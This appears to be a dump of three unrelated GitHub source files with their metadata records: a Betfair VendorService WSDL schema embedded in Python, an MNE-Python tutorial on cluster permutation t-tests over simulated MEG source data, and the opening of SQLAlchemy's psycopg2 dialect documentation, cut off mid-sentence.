<xsd:enumeration value='VENDOR_SOFTWARE_INVALID'/>
<xsd:enumeration value='VENDOR_SOFTWARE_INACTIVE'/>
<xsd:enumeration value='INVALID_VENDOR_CUSTOM_FIELD'/>
<xsd:enumeration value='INVALID_EXPIRY_DATE'/>
<xsd:enumeration value='API_ERROR'/>
</xsd:restriction>
</xsd:simpleType>
<xsd:complexType name="VendorSubscriptionReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="username" nillable="false" type="xsd:string"/>
<xsd:element name="vendorCustomField" nillable="false" type="xsd:string"/>
<xsd:element name="vendorClientId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="expiryDate" nillable="true" type="xsd:dateTime"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="VendorSubscriptionResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="errorCode" type="types:VendorSubscriptionErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
<xsd:element name="validUntil" type="xsd:dateTime"/>
<xsd:element name="vendorClientId" nillable="false" type="xsd:int"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:simpleType name="VendorSubscriptionErrorEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="OK"/>
<xsd:enumeration value="INVALID_USERNAME"/>
<xsd:enumeration value="USER_NOT_ACCOUNT_OWNER"/>
<xsd:enumeration value="INVALID_VENDOR_SOFTWARE_ID"/>
<xsd:enumeration value="LOGIN_FAILED_ACCOUNT_LOCKED"/>
<xsd:enumeration value="ACCOUNT_SUSPENDED"/>
<xsd:enumeration value="ACCOUNT_CLOSED"/>
<xsd:enumeration value="INVALID_VENDOR_SESSION" />
<xsd:enumeration value="OPERATOR_NOT_VENDORSOFTWARE_OWNER" />
<xsd:enumeration value="LOGIN_RESTRICTED_LOCATION"/>
<xsd:enumeration value="USER_ALREADY_SUBSCRIBED"/>
<xsd:enumeration value="INVALID_VENDOR_CLIENT_ID"/>
<xsd:enumeration value="INVALID_VENDOR_CUSTOM_FIELD"/>
<xsd:enumeration value="INVALID_INPUT_PARAMETERS"/>
<xsd:enumeration value="API_ERROR"/>
</xsd:restriction>
</xsd:simpleType>
<xsd:complexType name="CancelVendorSubscriptionReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="username" nillable="false" type="xsd:string"/>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorClientId" nillable="false" type="xsd:int"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="CancelVendorSubscriptionResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="errorCode" type="types:VendorSubscriptionErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="GetSubscriptionInfoReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="username" nillable="false" type="xsd:string"/>
<xsd:element name="vendorClientId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="GetSubscriptionInfoResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="vendorSoftware" nillable="true" type="xsd:int"/>
<xsd:element name="expiryDate" nillable="true" type="xsd:dateTime"/>
<xsd:element name="errorCode" type="types:VendorSubscriptionErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
<xsd:element name="status" nillable="true" type="types:VendorSoftwareClientStatusEnum"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="GetVendorInfoReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest"/>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="GetVendorInfoResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="vendorInfo" nillable="true" type="types:ArrayOfVendorSoftwareInfos"/>
<xsd:element name="errorCode" type="types:VendorSubscriptionErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="ArrayOfVendorSoftwareInfos">
<xsd:sequence>
<xsd:element name="vsInfo" form="qualified" maxOccurs="unbounded"
nillable="true" type="types:VendorSoftwareInfo"/>
</xsd:sequence>
</xsd:complexType>
<xsd:complexType name="VendorSoftwareInfo">
<xsd:sequence>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorSoftwareName" nillable="false" type="xsd:string"/>
<xsd:element name="activeClientsNo" type="xsd:long"/>
</xsd:sequence>
</xsd:complexType>
<xsd:complexType name="GetVendorUsersReq">
<xsd:complexContent>
<xsd:extension base="types:APIRequest">
<xsd:sequence>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="username" nillable="true" type="xsd:string"/>
<xsd:element name="usernameSearchModifier" type="types:SearchModifierEnum"/>
<xsd:element name="vendorCustomField" nillable="true" type="xsd:string"/>
<xsd:element name="customFieldSearchModifier" type="types:SearchModifierEnum"/>
<xsd:element name="expiryDateFrom" nillable="true" type="xsd:dateTime"/>
<xsd:element name="expiryDateTo" nillable="true" type="xsd:dateTime"/>
<xsd:element name="status" type="types:VendorSoftwareClientStatusEnum"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:simpleType name="SearchModifierEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="STARTS_WITH"/>
<xsd:enumeration value="EXACT"/>
<xsd:enumeration value="ENDS_WITH"/>
<xsd:enumeration value="CONTAINS"/>
</xsd:restriction>
</xsd:simpleType>
<xsd:complexType name="GetVendorUsersResp">
<xsd:complexContent>
<xsd:extension base="types:APIResponse">
<xsd:sequence>
<xsd:element name="vendorUsers" nillable="true" type="types:ArrayOfVendorUser"/>
<xsd:element name="errorCode" type="types:VendorSubscriptionErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
</xsd:sequence>
</xsd:extension>
</xsd:complexContent>
</xsd:complexType>
<xsd:complexType name="ArrayOfVendorUser">
<xsd:sequence>
<xsd:element name="vendorUser" form="qualified" maxOccurs="unbounded"
nillable="true" type="types:VendorUser"/>
</xsd:sequence>
</xsd:complexType>
<xsd:complexType name="VendorUser">
<xsd:sequence>
<xsd:element name="vendorSoftwareId" nillable="false" type="xsd:int"/>
<xsd:element name="username" nillable="false" type="xsd:string"/>
<xsd:element name="expiryDate" nillable="true" type="xsd:dateTime"/>
<xsd:element name="status" nillable="true" type="types:VendorSoftwareClientStatusEnum"/>
<xsd:element name="vendorClientId" nillable="false" type="xsd:int"/>
<xsd:element name="vendorCustomField" nillable="false" type="xsd:string"/>
<xsd:element name="createDate" nillable="true" type="xsd:dateTime"/>
</xsd:sequence>
</xsd:complexType>
<xsd:simpleType name="VendorSoftwareClientStatusEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="ACTIVE"/>
<xsd:enumeration value="CANCELLED"/>
<xsd:enumeration value="EXPIRED"/>
</xsd:restriction>
</xsd:simpleType>
<!-- base types copied from BFService wsdl-->
<xsd:complexType abstract="true" name="APIRequest">
<xsd:sequence>
<xsd:element name="header" nillable="true" type="types:APIRequestHeader"/>
</xsd:sequence>
</xsd:complexType>
<xsd:complexType name="APIRequestHeader">
<xsd:sequence>
<xsd:element name="clientStamp" type="xsd:long"/>
<xsd:element name="sessionToken" nillable="true" type="xsd:string"/>
</xsd:sequence>
</xsd:complexType>
<xsd:complexType abstract="true" name="APIResponse">
<xsd:sequence>
<xsd:element name="header" nillable="true" type="types:APIResponseHeader"/>
</xsd:sequence>
</xsd:complexType>
<xsd:complexType name="APIResponseHeader">
<xsd:sequence>
<xsd:element name="errorCode" type="types:APIErrorEnum"/>
<xsd:element name="minorErrorCode" nillable="true" type="xsd:string"/>
<xsd:element name="sessionToken" nillable="true" type="xsd:string"/>
<xsd:element name="timestamp" type="xsd:dateTime"/>
</xsd:sequence>
</xsd:complexType>
<xsd:simpleType name="APIErrorEnum">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="OK"/>
<xsd:enumeration value="INTERNAL_ERROR"/>
<xsd:enumeration value="EXCEEDED_THROTTLE"/>
<xsd:enumeration value="USER_NOT_SUBSCRIBED_TO_PRODUCT"/>
<xsd:enumeration value="SUBSCRIPTION_INACTIVE_OR_SUSPENDED"/>
<xsd:enumeration value="VENDOR_SOFTWARE_INACTIVE"/>
<xsd:enumeration value="VENDOR_SOFTWARE_INVALID"/>
<xsd:enumeration value="SERVICE_NOT_AVAILABLE_IN_PRODUCT"/>
<xsd:enumeration value="NO_SESSION"/>
<xsd:enumeration value="TOO_MANY_REQUESTS"/>
<xsd:enumeration value="PRODUCT_REQUIRES_FUNDED_ACCOUNT"/>
<xsd:enumeration value="SERVICE_NOT_AVAILABLE_FOR_LOGIN_STATUS"/>
</xsd:restriction>
</xsd:simpleType>
</xsd:schema>
<xsd:schema elementFormDefault="qualified" targetNamespace="http://www.betfair.com/adminapi/v2/VendorService/">
<xsd:import namespace="http://www.betfair.com/adminapi/types/v2/"/>
<xsd:element name="setAccessRequest">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:SetAccessRequestReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="setAccessRequestResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:SetAccessRequestResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="cancelVendorAccessRequest">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:CancelVendorAccessRequestReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="cancelVendorAccessRequestResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:CancelVendorAccessRequestResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getVendorAccessRequests">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:GetVendorAccessRequestsReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getVendorAccessRequestsResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:GetVendorAccessRequestsResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="createVendorAccessRequest">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:CreateVendorAccessRequestReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="createVendorAccessRequestResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:CreateVendorAccessRequestResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="addVendorSubscription">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:VendorSubscriptionReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="addVendorSubscriptionResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:VendorSubscriptionResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="updateVendorSubscription">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:VendorSubscriptionReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="updateVendorSubscriptionResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:VendorSubscriptionResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="cancelVendorSubscription">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:CancelVendorSubscriptionReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="cancelVendorSubscriptionResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:CancelVendorSubscriptionResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getSubscriptionInfo">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:GetSubscriptionInfoReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getSubscriptionInfoResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:GetSubscriptionInfoResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getVendorInfo">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:GetVendorInfoReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getVendorInfoResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:GetVendorInfoResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getVendorUsers">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="request" type="types:GetVendorUsersReq"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
<xsd:element name="getVendorUsersResponse">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="Result" nillable="true" type="types:GetVendorUsersResp"/>
</xsd:sequence>
</xsd:complexType>
</xsd:element>
</xsd:schema>
</wsdl:types>
<wsdl:message name="setAccessRequestIn">
<wsdl:part element="tns:setAccessRequest" name="parameters"/>
</wsdl:message>
<wsdl:message name="setAccessRequestOut">
<wsdl:part element="tns:setAccessRequestResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="cancelVendorAccessRequestIn">
<wsdl:part element="tns:cancelVendorAccessRequest" name="parameters"/>
</wsdl:message>
<wsdl:message name="cancelVendorAccessRequestOut">
<wsdl:part element="tns:cancelVendorAccessRequestResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="getVendorAccessRequestsIn">
<wsdl:part element="tns:getVendorAccessRequests" name="parameters"/>
</wsdl:message>
<wsdl:message name="getVendorAccessRequestsOut">
<wsdl:part element="tns:getVendorAccessRequestsResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="createVendorAccessRequestIn">
<wsdl:part element="tns:createVendorAccessRequest" name="parameters"/>
</wsdl:message>
<wsdl:message name="createVendorAccessRequestOut">
<wsdl:part element="tns:createVendorAccessRequestResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="addVendorSubscriptionIn">
<wsdl:part element="tns:addVendorSubscription" name="parameters"/>
</wsdl:message>
<wsdl:message name="addVendorSubscriptionOut">
<wsdl:part element="tns:addVendorSubscriptionResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="updateVendorSubscriptionIn">
<wsdl:part element="tns:updateVendorSubscription" name="parameters"/>
</wsdl:message>
<wsdl:message name="updateVendorSubscriptionOut">
<wsdl:part element="tns:updateVendorSubscriptionResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="cancelVendorSubscriptionIn">
<wsdl:part element="tns:cancelVendorSubscription" name="parameters"/>
</wsdl:message>
<wsdl:message name="cancelVendorSubscriptionOut">
<wsdl:part element="tns:cancelVendorSubscriptionResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="getSubscriptionInfoIn">
<wsdl:part element="tns:getSubscriptionInfo" name="parameters"/>
</wsdl:message>
<wsdl:message name="getSubscriptionInfoOut">
<wsdl:part element="tns:getSubscriptionInfoResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="getVendorInfoIn">
<wsdl:part element="tns:getVendorInfo" name="parameters"/>
</wsdl:message>
<wsdl:message name="getVendorInfoOut">
<wsdl:part element="tns:getVendorInfoResponse" name="parameters"/>
</wsdl:message>
<wsdl:message name="getVendorUsersIn">
<wsdl:part element="tns:getVendorUsers" name="parameters"/>
</wsdl:message>
<wsdl:message name="getVendorUsersOut">
<wsdl:part element="tns:getVendorUsersResponse" name="parameters"/>
</wsdl:message>
<wsdl:portType name="VendorService">
<wsdl:operation name="setAccessRequest">
<wsdl:input message="tns:setAccessRequestIn" name="setAccessRequestIn"/>
<wsdl:output message="tns:setAccessRequestOut" name="setAccessRequestOut"/>
</wsdl:operation>
<wsdl:operation name="cancelVendorAccessRequest">
<wsdl:input message="tns:cancelVendorAccessRequestIn" name="cancelVendorAccessRequestIn"/>
<wsdl:output message="tns:cancelVendorAccessRequestOut" name="cancelVendorAccessRequestOut"/>
</wsdl:operation>
<wsdl:operation name="getVendorAccessRequests">
<wsdl:input message="tns:getVendorAccessRequestsIn" name="getVendorAccessRequestsIn"/>
<wsdl:output message="tns:getVendorAccessRequestsOut" name="getVendorAccessRequestsOut"/>
</wsdl:operation>
<wsdl:operation name="createVendorAccessRequest">
<wsdl:input message="tns:createVendorAccessRequestIn" name="createVendorAccessRequestIn"/>
<wsdl:output message="tns:createVendorAccessRequestOut" name="createVendorAccessRequestOut"/>
</wsdl:operation>
<wsdl:operation name="addVendorSubscription">
<wsdl:input message="tns:addVendorSubscriptionIn" name="addVendorSubscriptionIn"/>
<wsdl:output message="tns:addVendorSubscriptionOut" name="addVendorSubscriptionOut"/>
</wsdl:operation>
<wsdl:operation name="updateVendorSubscription">
<wsdl:input message="tns:updateVendorSubscriptionIn" name="updateVendorSubscriptionIn"/>
<wsdl:output message="tns:updateVendorSubscriptionOut" name="updateVendorSubscriptionOut"/>
</wsdl:operation>
<wsdl:operation name="cancelVendorSubscription">
<wsdl:input message="tns:cancelVendorSubscriptionIn" name="cancelVendorSubscriptionIn"/>
<wsdl:output message="tns:cancelVendorSubscriptionOut" name="cancelVendorSubscriptionOut"/>
</wsdl:operation>
<wsdl:operation name="getSubscriptionInfo">
<wsdl:input message="tns:getSubscriptionInfoIn" name="getSubscriptionInfoIn"/>
<wsdl:output message="tns:getSubscriptionInfoOut" name="getSubscriptionInfoOut"/>
</wsdl:operation>
<wsdl:operation name="getVendorInfo">
<wsdl:input message="tns:getVendorInfoIn" name="getVendorInfoIn"/>
<wsdl:output message="tns:getVendorInfoOut" name="getVendorInfoOut"/>
</wsdl:operation>
<wsdl:operation name="getVendorUsers">
<wsdl:input message="tns:getVendorUsersIn" name="getVendorUsersIn"/>
<wsdl:output message="tns:getVendorUsersOut" name="getVendorUsersOut"/>
</wsdl:operation>
</wsdl:portType>
<wsdl:binding name="VendorService" type="tns:VendorService">
<soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
<wsdl:operation name="setAccessRequest">
<soap:operation soapAction="setAccessRequest" style="document"/>
<wsdl:input name="setAccessRequestIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="setAccessRequestOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="cancelVendorAccessRequest">
<soap:operation soapAction="cancelVendorAccessRequest" style="document"/>
<wsdl:input name="cancelVendorAccessRequestIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="cancelVendorAccessRequestOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="getVendorAccessRequests">
<soap:operation soapAction="getVendorAccessRequests" style="document"/>
<wsdl:input name="getVendorAccessRequestsIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="getVendorAccessRequestsOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="createVendorAccessRequest">
<soap:operation soapAction="createVendorAccessRequest" style="document"/>
<wsdl:input name="createVendorAccessRequestIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="createVendorAccessRequestOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="addVendorSubscription">
<soap:operation soapAction="addVendorSubscription" style="document"/>
<wsdl:input name="addVendorSubscriptionIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="addVendorSubscriptionOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="updateVendorSubscription">
<soap:operation soapAction="updateVendorSubscription" style="document"/>
<wsdl:input name="updateVendorSubscriptionIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="updateVendorSubscriptionOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="cancelVendorSubscription">
<soap:operation soapAction="cancelVendorSubscription" style="document"/>
<wsdl:input name="cancelVendorSubscriptionIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="cancelVendorSubscriptionOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="getSubscriptionInfo">
<soap:operation soapAction="getSubscriptionInfo" style="document"/>
<wsdl:input name="getSubscriptionInfoIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="getSubscriptionInfoOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="getVendorInfo">
<soap:operation soapAction="getVendorInfo" style="document"/>
<wsdl:input name="getVendorInfoIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="getVendorInfoOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="getVendorUsers">
<soap:operation soapAction="getVendorUsers" style="document"/>
<wsdl:input name="getVendorUsersIn">
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output name="getVendorUsersOut">
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
</wsdl:binding>
<wsdl:service name="VendorService">
<wsdl:port binding="tns:VendorService" name="VendorService">
<soap:address location="https://api.betfair.com/admin-api/v2/VendorService"/>
</wsdl:port>
</wsdl:service>
</wsdl:definitions>
'''
|
{
"content_hash": "056af675ef0f6b255c80b0f8cdca6e00",
"timestamp": "",
"source": "github",
"line_count": 828,
"max_line_length": 459,
"avg_line_length": 44.828502415458935,
"alnum_prop": 0.6550999515060079,
"repo_name": "kells1986/Betfair-Finktank-Tool",
"id": "8a4d329fc1ff0790d154958b83432e27b2280ce4",
"size": "38260",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "bft/bfpy/bfwsdl/bfvendor.py",
"mode": "33261",
"license": "mit",
"language": [],
"symlink_target": ""
}
|
"""
.. _tut_stats_cluster_source_1samp:
=================================================================
Permutation t-test on source data with spatio-temporal clustering
=================================================================
Tests if the evoked response is significantly different between
conditions across subjects (simulated here using one subject's data).
The multiple comparisons problem is addressed with a cluster-level
permutation test across space and time.
"""
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Eric Larson <larson.eric.d@gmail.com>
# License: BSD (3-clause)
import os.path as op
import numpy as np
from numpy.random import randn
from scipy import stats as stats
import mne
from mne import (io, spatial_tris_connectivity, compute_morph_matrix,
grade_to_tris)
from mne.epochs import equalize_epoch_counts
from mne.stats import (spatio_temporal_cluster_1samp_test,
summarize_clusters_stc)
from mne.minimum_norm import apply_inverse, read_inverse_operator
from mne.datasets import sample
print(__doc__)
###############################################################################
# Set parameters
# --------------
data_path = sample.data_path()
raw_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw.fif'
event_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw-eve.fif'
subjects_dir = data_path + '/subjects'
tmin = -0.2
tmax = 0.3 # Use a lower tmax to reduce multiple comparisons
# Setup for reading the raw data
raw = io.read_raw_fif(raw_fname)
events = mne.read_events(event_fname)
###############################################################################
# Read epochs for all channels, removing a bad one
# ------------------------------------------------
raw.info['bads'] += ['MEG 2443']
picks = mne.pick_types(raw.info, meg=True, eog=True, exclude='bads')
event_id = 1 # L auditory
reject = dict(grad=1000e-13, mag=4000e-15, eog=150e-6)
epochs1 = mne.Epochs(raw, events, event_id, tmin, tmax, picks=picks,
baseline=(None, 0), reject=reject, preload=True)
event_id = 3 # L visual
epochs2 = mne.Epochs(raw, events, event_id, tmin, tmax, picks=picks,
baseline=(None, 0), reject=reject, preload=True)
# Equalize trial counts to eliminate bias (which would otherwise be
# introduced by the abs() performed below)
equalize_epoch_counts([epochs1, epochs2])
###############################################################################
# Transform to source space
# -------------------------
fname_inv = data_path + '/MEG/sample/sample_audvis-meg-oct-6-meg-inv.fif'
snr = 3.0
lambda2 = 1.0 / snr ** 2
method = "dSPM" # use dSPM method (could also be MNE or sLORETA)
inverse_operator = read_inverse_operator(fname_inv)
sample_vertices = [s['vertno'] for s in inverse_operator['src']]
# Let's average and compute inverse, resampling to speed things up
evoked1 = epochs1.average()
evoked1.resample(50, npad='auto')
condition1 = apply_inverse(evoked1, inverse_operator, lambda2, method)
evoked2 = epochs2.average()
evoked2.resample(50, npad='auto')
condition2 = apply_inverse(evoked2, inverse_operator, lambda2, method)
# Let's only deal with t > 0, cropping to reduce multiple comparisons
condition1.crop(0, None)
condition2.crop(0, None)
tmin = condition1.tmin
tstep = condition1.tstep
###############################################################################
# Transform to common cortical space
# ----------------------------------
#
# Normally you would read in estimates across several subjects and morph
# them to the same cortical space (e.g. fsaverage). For example purposes,
# we will simulate this by just having each "subject" have the same
# response (just noisy in source space) here.
#
# .. note::
# Note that for 7 subjects with a two-sided statistical test, the minimum
# significance under a permutation test is only p = 1/(2 ** 6) = 0.015,
# which is large.
n_vertices_sample, n_times = condition1.data.shape
n_subjects = 7
print('Simulating data for %d subjects.' % n_subjects)
# Let's make sure our results replicate, so set the seed.
np.random.seed(0)
X = randn(n_vertices_sample, n_times, n_subjects, 2) * 10
X[:, :, :, 0] += condition1.data[:, :, np.newaxis]
X[:, :, :, 1] += condition2.data[:, :, np.newaxis]
###############################################################################
# It's a good idea to spatially smooth the data, and for visualization
# purposes, let's morph these to fsaverage, which is a grade 5 source space
# with vertices 0:10242 for each hemisphere. Usually you'd have to morph
# each subject's data separately (and you might want to use morph_data
# instead), but here since all estimates are on 'sample' we can use one
# morph matrix for all the heavy lifting.
fsave_vertices = [np.arange(10242), np.arange(10242)]
morph_mat = compute_morph_matrix('sample', 'fsaverage', sample_vertices,
fsave_vertices, 20, subjects_dir)
n_vertices_fsave = morph_mat.shape[0]
# We have to change the shape for the dot() to work properly
X = X.reshape(n_vertices_sample, n_times * n_subjects * 2)
print('Morphing data.')
X = morph_mat.dot(X) # morph_mat is a sparse matrix
X = X.reshape(n_vertices_fsave, n_times, n_subjects, 2)
###############################################################################
# Finally, we want to compare the overall activity levels in each condition,
# the diff is taken along the last axis (condition). The negative sign makes
# it so condition1 > condition2 shows up as "red blobs" (instead of blue).
X = np.abs(X) # only magnitude
X = X[:, :, :, 0] - X[:, :, :, 1] # make paired contrast
###############################################################################
# Compute statistic
# -----------------
#
# To use an algorithm optimized for spatio-temporal clustering, we
# just pass the spatial connectivity matrix (instead of spatio-temporal)
print('Computing connectivity.')
connectivity = spatial_tris_connectivity(grade_to_tris(5))
# Note that X needs to be a multi-dimensional array of shape
# samples (subjects) x time x space, so we permute dimensions
X = np.transpose(X, [2, 1, 0])
# Now let's actually do the clustering. This can take a long time...
# Here we set the threshold quite high to reduce computation.
p_threshold = 0.001
t_threshold = -stats.distributions.t.ppf(p_threshold / 2., n_subjects - 1)
print('Clustering.')
T_obs, clusters, cluster_p_values, H0 = clu = \
spatio_temporal_cluster_1samp_test(X, connectivity=connectivity, n_jobs=1,
threshold=t_threshold)
# Now select the clusters that are sig. at p < 0.05 (note that this value
# is multiple-comparisons corrected).
good_cluster_inds = np.where(cluster_p_values < 0.05)[0]
###############################################################################
# Visualize the clusters
# ----------------------
print('Visualizing clusters.')
# Now let's build a convenient representation of each cluster, where each
# cluster becomes a "time point" in the SourceEstimate
stc_all_cluster_vis = summarize_clusters_stc(clu, tstep=tstep,
vertices=fsave_vertices,
subject='fsaverage')
# Let's actually plot the first "time point" in the SourceEstimate, which
# shows all the clusters, weighted by duration
subjects_dir = op.join(data_path, 'subjects')
# blue blobs are for condition A < condition B, red for A > B
brain = stc_all_cluster_vis.plot(hemi='both', views='lateral',
subjects_dir=subjects_dir,
time_label='Duration significant (ms)')
brain.save_image('clusters.png')
|
{
"content_hash": "787e15d678d2ea682df12c98afd23ab2",
"timestamp": "",
"source": "github",
"line_count": 186,
"max_line_length": 79,
"avg_line_length": 42.166666666666664,
"alnum_prop": 0.613795741425475,
"repo_name": "nicproulx/mne-python",
"id": "059b34d99f390700def7d47b323e231bc29e2799",
"size": "7843",
"binary": false,
"copies": "9",
"ref": "refs/heads/placeholder",
"path": "tutorials/plot_stats_cluster_spatio_temporal.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Csound Document",
"bytes": "69806"
},
{
"name": "Makefile",
"bytes": "3723"
},
{
"name": "Python",
"bytes": "5866703"
},
{
"name": "Shell",
"bytes": "936"
}
],
"symlink_target": ""
}
|
"""
.. dialect:: postgresql+psycopg2
:name: psycopg2
:dbapi: psycopg2
:connectstring: postgresql+psycopg2://user:password@host:port/dbname[?key=value&key=value...]
:url: http://pypi.python.org/pypi/psycopg2/
psycopg2 Connect Arguments
-----------------------------------
psycopg2-specific keyword arguments which are accepted by
:func:`.create_engine()` are:
* ``server_side_cursors``: Enable the usage of "server side cursors" for SQL
statements which support this feature. What this essentially means from a
psycopg2 point of view is that the cursor is created using a name, e.g.
``connection.cursor('some name')``, which has the effect that result rows are
not immediately pre-fetched and buffered after statement execution, but are
instead left on the server and only retrieved as needed. SQLAlchemy's
:class:`~sqlalchemy.engine.ResultProxy` uses special row-buffering
behavior when this feature is enabled, such that groups of 100 rows at a
